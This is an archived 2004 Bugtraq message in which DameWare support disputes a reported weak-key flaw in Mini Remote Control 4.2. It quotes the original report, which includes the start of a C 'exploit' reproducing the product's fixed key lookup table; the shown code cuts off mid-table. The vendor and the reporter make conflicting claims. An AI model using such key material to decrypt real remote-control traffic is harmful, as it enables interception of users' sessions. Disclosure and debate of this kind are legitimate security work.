lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 4 May 2004 17:51:45 -0000
From: DameWare Support <support@...eware.com>
To: bugtraq@...urityfocus.com
Subject: Re: (HOAX) Dameware Mini Remote Control Version 4.2 ? Weak Key
    Agreement Scheme


In-Reply-To: <20040430182646.29912.qmail@....securityfocus.com>


This is definitely not an exploit, nor is it a vulnerability and therefore inaccurate & misleading. Furthermore, the information submitted by ax09001h@...mail.com has nothing to do with obtaining the Session Encryption Key, nor does it reveal any confidential information. It is entirely "pre-authentication" information that has nothing to do with the Session Encryption Key, and it cannot be used to obtain the actual Session Encryption Key.

The "Pre Authentication" data that is being encrypted/decrypted at this point in the remote control connection is not sensitive information and could just as well be sent in plain text.  This so called "weak key" is not used for encrypting sensitive data and is only is used once for a single transmission of pre authentication data.

ax09001h@...mail.com made no attempts to contact DameWare Development directly to verify this claim before releasing the information. It is extremely irresponsible for anyone to release this kind of information without first contacting the vendor to verify its accuracy. Based on his or her actions it's fairly obvious that this anonymous person and or company are deliberately attempting to discredit DameWare Development & it's Mini Remote Control program.

Support Staff
DameWare Development, LLC.
http://www.dameware.com

>Received: (qmail 2813 invoked from network); 30 Apr 2004 19:34:03 -0000
>Received: from outgoing3.securityfocus.com (HELO outgoing.securityfocus.com) (205.206.231.27)
>  by mail.securityfocus.com with SMTP; 30 Apr 2004 19:34:03 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
>	by outgoing.securityfocus.com (Postfix) with QMQP
>	id EE330236FDE; Fri, 30 Apr 2004 21:27:49 -0600 (MDT)
>Mailing-List: contact bugtraq-help@...urityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@...urityfocus.com>
>List-Help: <mailto:bugtraq-help@...urityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@...urityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@...urityfocus.com>
>Delivered-To: mailing list bugtraq@...urityfocus.com
>Delivered-To: moderator for bugtraq@...urityfocus.com
>Received: (qmail 16648 invoked from network); 30 Apr 2004 12:57:51 -0000
>Date: 30 Apr 2004 18:26:46 -0000
>Message-ID: <20040430182646.29912.qmail@....securityfocus.com>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: ax09001h <ax09001h@...mail.com>
>To: bugtraq@...urityfocus.com
>Subject: Dameware Mini Remote Control Version 4.2 ? Weak Key Agreement Scheme
>
>
>
>Title: Dameware Mini Remote Control Version 4.2 ? Weak Key Agreement Scheme
>
>Versions: 	Dameware Mini Remote Control Version 4.2
>		
>
>Vulnerability: The latest version of Dameware?s Mini Remote Control System uses a weak key agreement scheme.  The scheme consists of the sharing of pointers into a fixed key lookup table.  Both the client and the server have access to a key lookup table (KLT) consisting of 1000 32-bit values.    Prior to encrypting traffic the server sends to the client a series of 32-bit integers, call it the key index table (KIT).  For the sake of description lets call the indices klt_idx[4], an array of 4 32-bit integers.  The klt_idx are set as follows:
>
>klt_idx[0] = KIT[100];
>klt_idx[1] = KIT[4];
>klt_idx[2] = 42;
>klt_idx[3] = KIT[37];
>
>The actual session key is then constructed as 4 32-bit integers, sk[4] as follows.
>
>	sk[0] = KLT[klt_idx[0]];
>	sk[1] = KLT[klt_idx[1]]; 
>	sk[2] = KLT[klt_idx[2]];
>	sk[3] = KLT[klt_idx[3]];
>
>This of course produces 0-bits of security.
>
>They proceed to correct the Electronic Code Book mode of encrypting other authentication packets using the above constructed key using Blowfish in cipher block chaining mode with an IV = 0.  
>
>Exploit:
>
>/*
>
>	dwgenkey.c			dameware generate key program.
>
>					this function mimics the dameware
>					key generation algorithm used to 
>					pass encrypted windows authentication 
>					across between client and server
>			
>
>					ax09001h@...mail.com
>
>
>*/
>
>
>#include <stdio.h>
>#include <stdlib.h>
>
>
>unsigned int	KLT [1000] = 
>{
>	0x75A50CF3, 0x58509D61, 0x2352671F, 0x1C8694B4, 0x464A5B8D, 0x17F76F5D,
>	0xF7CBFF22, 0xDEE4BBE7, 0x87C577D7, 0x7DE79418, 0x63099A11, 0x7FB4509,
>	0xF8AE103C, 0xB8956F47, 0xA788EF1E, 0xBC1B225E, 0x1F6F1B29,	0x48A20FA2, 
>	0x73764E64, 0x9B1BAFE5, 0xC74859E3, 0xF34C3973, 0xD782E7EB,	0xBC2B83CD, 
>	0x333141DD, 0x78F91C49, 0x8C3C3C62, 0x430F1CA6, 0xF55CB058,	0x5474C05, 
>	0x2AD30B5F, 0x47B3AA97, 0xD1DE6ED1, 0x927DD4C0, 0x9043C47A,	0xCFA8D725, 
>	0x8F2A794B, 0x916758FC, 0x5C21B4C0, 0xAF5D6F28, 0x2E5B2EE9, 0xA4772762, 
>	0x5C35CBA8, 0x359EE4E1, 0xA778F423, 0xB4EB8D16,	0x846238D7, 0x9B9C7F88, 
>	0x708517E4, 0x8346D4FA, 0xE131395B, 0xB95282FD,	0x5434DB89, 0x2B00247B, 
>	0xAB5A14EC, 0x6A74879C, 0x1DF2EDE1, 0x9E9CBAD8,	0x6E4F97D5, 0x8910C7AE, 
>	0x6C76CD48, 0x4C5C0FDE, 0x1C408E04, 0xB1DC5C7B,	0xB226FFC5, 0x5C1D1096, 
>	0xA92D865A, 0x48D0FF4C, 0x87F9BF23, 0xF5E864C9,	0x80154A84, 0x38987089, 
>	0xA4F0EE08, 0x1630ADB9, 0x99F564BD, 0x69394C04,	0xC790C3E5, 0xF0E9E87E, 
>	0xB9F8AF1C, 0xF797E46C, 0x5F2F339D,	0xB792AB5F, 0x462050F7, 0xF922EDBD, 
>	0xD8EC238B, 0xDE30DFB6, 0xCAE883E7, 0x77748FED, 0x681AB4C8, 0x1610F821, 
>	0xAA69288,  0x88E41CCD, 0x81BEA8DB, 0x56236206, 0x3FF596A7, 0x7EB79B23, 
>	0x2939A1A1, 0x59F56A53, 0x175ACD1D, 0x9D442B3E, 0xCB0D47E3, 0x81BD054E, 
>	0xC5B5AED3, 0x420BFE41,	0xBA3446BE, 0x1F8AC66A, 0xB12D2A33, 0xD52EB9F3, 
>	0xFD572127,	0x1ED5C98C, 0x891E0430, 0x263E5AC2, 0xFCEBC8D7, 0x84ACE5F7, 
>	0x1093FA43,	0xFD07DD1D, 0xC4C91870, 0x1952527F, 0xF77D5A1B, 0xAA6E479B,
>	0x26BBC409, 0x1B694B08, 0xAB1246FB, 0x413D0BB5, 0xAC6A46C9, 0x79217008,
>	0x315A6C60, 0xA18609FB, 0x37C4221C, 0xD25D2622, 0x6CA0CC6F, 0x6E3A0EDC,
>	0x9EA7C082, 0x8F22351D, 0xC58AEC76, 0x8A59BFEF, 0x98C5888F, 0x5EA76365,
>	0x7E8B04D1, 0x44B5282D, 0x72547943, 0x6B49B88, 0xD8644EF3, 0x4DCA10BE,
>	0x6666892F, 0xAC773084, 0x85A718BE, 0x9C648D4A, 0x3D6787F1, 0xED2DB263,
>	0xCB0129DC, 0xAFB919E3, 0x2385872E, 0xE119C18F, 0x8F4ABB22,	0x7A153138, 
>	0xF4537078, 0x7B535CE4, 0x17E50602, 0x86AF582E, 0xA96A418E,	0x2E464810, 
>	0xEC0F2BF1, 0xD7500E84, 0xFB8248CB, 0xB6A0934D, 0x45A2F984, 0xDBB687C0, 
>	0x4FADD405, 0x19E5677B, 0x327DAB10, 0x6E82DD9C, 0x28B99205, 0x627FB642, 
>	0x13266166, 0xAC1D207E, 0x6757CB08, 0x75A551EE, 0xD8D440C7, 0xF9E198F7, 
>	0xDCD6C5DD, 0x9E91F814, 0xD411C844, 0x7CD5073B, 0x711214E6, 0x419766DA, 
>	0xE5209EFB, 0x1A4E0702, 0xD8B6C71, 	0xDA3EAE89, 0xA1A00078, 0xB55B5C3E, 
>	0xE8EB204C, 0x9092BCB5, 0x753F8AA, 0x25DBC9DC, 0x75855E4, 0x5486F63D, 
>	0xE21C3971, 0x206B068A, 0xAEF41F63, 0xD6C45A84, 0x55CA81BF, 0x245EE02E, 
>	0x20A277EC, 0x2688325E, 0x5CC597BC, 0xC3C6D5, 0xE10FA336, 0x1E038ED1, 
>	0xD017BAA1, 0x60F3B322, 0x5C4B7883, 0x37C8827F, 0xA4401AB8, 0x3F0D1244, 
>	0x599287A9, 0x9FEBF317, 0x551B9574, 0x7B4490D6, 0x5167A51E, 0x75144C86, 
>	0xB58FA84E, 0xC2EFCD51, 0x62B1B44C, 0xF20CB94C, 0xFB1C3022, 0x5D9FA80E, 
>	0x9723B02E, 0x9BEB9BC0, 0x7D7D7D7C, 0xBBECAC8, 0xEE7C8FD6, 0x84E7032B, 
>	0x983051AE, 0x69E077E1, 0x4215FF00, 0x941F1398, 0x899CE29, 0x34FD70CC, 
>	0x151A4D02, 0x625EFD60, 0xCC9FC987, 0x5854F10C, 0xFDE6B36A, 0xE50E1F0, 
>	0x7D1AC470, 0x75CF6430, 0x691B188E, 0x861F8385, 0x899781B9, 0x453BBB9, 
>	0x33CCF322, 0x5BC03054, 0x1C8F4BCE, 0xB20EAD6C, 0x8FC48E15, 0xC650FD0C, 
>	0x5F9D8872, 0xD100E234, 0xCEBB178A, 0x20F2529F, 0x912889F8, 0x58EDD3F6, 
>	0x27F8EADA, 0xE501536D, 0xB8635884, 0x5525004, 0x9B6EBF24, 0x4E223C61, 
>	0x67C61B28, 0xBC8D0315, 0x186A6C99, 0xDAD6D525, 0x1C412AD1, 0x86B268E4, 
>	0x47B5AC03, 0x72506EEA, 0xCDF419F9, 0x9E062DB4, 0x236F81F7, 0xCF4BFFDF, 
>	0xF38B27B8, 0x17A2E942, 0xBDF70DFD, 0xB3ED596B, 0xD24583F5, 0x7D25304E,
>	0x209350C6, 0xD171038E, 0xA7F746D2, 0x4DD38415, 0x7F7FB4D9, 0x60F193B5,
>	0xAF480C11, 0x23E73939, 0x77853419, 0x835D55CE, 0xBCA629D0, 0xCDDA82C9,
>	0xC6EC6933, 0xFD779112, 0x3477605F, 0xD56B9610, 0xAAB266A6,	0xF53E8558, 
>	0x61D7B1D6, 0x5C5ADCD4, 0x9C4C685B, 0x47D4C3FE, 0x956BB743, 0x7BEAB72C, 
>	0xEE0CADD4, 0x844F5B3D, 0xF6B76242, 0x7A48638E, 0x7A9FCA83, 0x8C5CFCB8, 
>	0xC5C0200F, 0x458E401B, 0xD0232077, 0x96EC41FB, 0x818E1178, 0xF039C809, 
>	0xD2CBF2F3, 0xD710BBDF, 0xAF373B6F, 0xECFF5238, 0xA7A90C76, 0xB291F856, 
>	0x76378535, 0x8AC59C93, 0xCC083868, 0x10B3DCBD, 0x726A72D1, 0xCAA8BABB, 
>	0x9C519F9B, 0xE57B91C2, 0x3938CA06, 0x8AB0A001, 0x81154FB1, 0xB8B999D9, 
>	0xB385C69F, 0xF62E1A24, 0xE352A419, 0x52719D67, 0x23D0D6E4, 0xD143E405, 
>	0x17D114A3, 0x7A590816, 0x4FB4C683, 0x96DE0346, 0x1C96B2B3, 0xE0FE73B, 
>	0x51FA1A82, 0xB5A325A9,	0x7244452E, 0x88411A62, 0x10F37E47, 0x80E9235D, 
>	0x8734E043, 0x7287A203, 0x7D322B79, 0x59F16B1A, 0xB715C112, 0x7F930942, 
>	0xE31AF1D4, 0xC8312072, 0xB949A15E, 0xE5A0942A, 0x21C62B9F, 0x3A8E4A04, 
>	0xA7B50B0A, 0xC7481BF1, 0xF1E2DB36, 0x8120EAAB, 0x9364D482, 0x481D5B4D, 
>	0x58460CE7, 0x6E1FE474, 0xCB180DE1, 0xF1FEA961, 0x6E663723, 0x7F713621, 
>	0xC421154,  0x14B18B19, 0xEB87F422, 0xE2100D60, 0x65ACBC65, 0xC1EA51EA,
>	0x9DD0DF6A, 0x9AE68741, 0x1F5DEFA2, 0xA530969B, 0xB746D9D5, 0x1339A116,
>	0x7C07054,  0xE118D5CE, 0xF13EE7DA, 0xA53EBE1E, 0x3864BC9,  0x27C3B146,
>	0xF2057DFD, 0x5CDF8621, 0x24BBFA19, 0x9C207686, 0xFDA8C0B4, 0x7BC12DE,
>	0x3B6E6ABD, 0xEE88CB8E, 0xF11F5F31, 0x17C36F90, 0x62545D14, 0x23BAA683,
>	0xBCF05635, 0xEE710A20, 0x88D5C4C1, 0x45D242BC, 0x2618DAFA, 0x71C24008,
>	0xEFF1F3E8, 0x90537430, 0xF941923C, 0xE806B643, 0x1E8F4C81,	0x98E93630, 
>	0x90ECFFE3, 0x422C75E1, 0xA19D77D3, 0x99D16114, 0xCA4380C8,	0xAF2A72E8, 
>	0x71114704, 0x97EBE3E0, 0x90D614F6, 0xF5408B6D, 0x841EE866, 0x35699601, 
>	0x9C004E8F, 0x5ACAC96F, 0xF1D181D3, 0xB1DB1F66, 0xAD36B6E6,	0xA3C182A3, 
>	0x6E159D3A, 0x4860F191, 0xA22499C0, 0xA8DD59AB,	0x5E729975, 0x5285CEC2, 
>	0xF0505102, 0x87294945, 0x17EE75CA, 0xD5E97597,	0xC36CD9A,  0xA45A497, 
>	0xA1215DDF, 0x41C84062, 0xC1C6536E, 0xE8AEF5BF,	0xBF109C2E, 0x402A1D1C, 
>	0x67DEDD8,  0x97061C4A, 0x936BACD0, 0xC34A5C19,	0xF40F90FE, 0xD7B03D1, 
>	0xD7C91313, 0xE03CF91D, 0x7176F3D4, 0x29440055, 0xBBB3A31C, 0x70F5A3C2, 
>	0x76E7D2A6, 0x536501F,  0xC77CA12B,	0x5E6E2842, 0x9896F26C, 0x2BC45D27, 
>	0xE2FF89C7, 0x11FBC8C,  0x252652BD,	0x61AA26A4, 0xF3DF28A,  0xAFB90C39, 
>	0x3C5BCF12, 0xE765B3A5, 0x6EBF07FE,	0x2630C3A2, 0xC0F995BC, 0x27677058, 
>	0x49E5FA9C, 0x3B66C518, 0x7654283D,	0xB8305341, 0x72E94CF,  0x3E181088, 
>	0x9F721122, 0xC536D545, 0x8BD48FE7,	0xA0899C0F, 0x950D4B9C, 0xCDFA8F86, 
>	0x9D1180B5, 0xB35F2925, 0x85CA36ED, 0x9FA58055, 0xEF0F31F9, 0xA5FADD9C, 
>	0x2ABB9F51, 0xC90E060A,	0xA0304ED8, 0xB6462678, 0x5ECAB5CB, 0x9BFA4C0C, 
>	0x1644830E, 0xC210F8D0,	0x3139A59B, 0xDE090D20, 0x89960C79, 0x489E6E7D, 
>	0xC3650D3F, 0x832E301C,	0x3EC2DEC2, 0x8C1BEFD2, 0x15374CE3, 0xA95682A4, 
>	0x694B8053, 0x8C003F9E,	0x3C792799, 0xC31B2A4B, 0xFD6F5781, 0x544F000B, 
>	0x151F60A6, 0x224E32E5,	0x9AD498E6, 0x8B74BFCC, 0x85C8C5DA, 0x221D7990, 
>	0x66C4A629, 0x1281D60A,	0xE0178028, 0x44E6DEBD, 0xBAAB265,  0x384C4B56, 
>	0xDC2F9A2C, 0x470211A4,	0xCBD167C3, 0xF5EED383, 0x1E1ED189, 0x29D803F9, 
>	0xC144F12E,	0x9AC2B5AB, 0xC3DB04A2, 0xC513EB91, 0x71DCF85C, 0x343B65E3, 
>	0x6B32E419,	0xAFFC770D, 0xBCE86B4D, 0x9AA723E4, 0x611A0E70, 0xFA441603,
>	0x3171887D, 0x5AC8ABCD, 0x45A5A2E4, 0xA47AFB05, 0xF1FBA2F1, 0x1F7FA63


Powered by blists - more mailing lists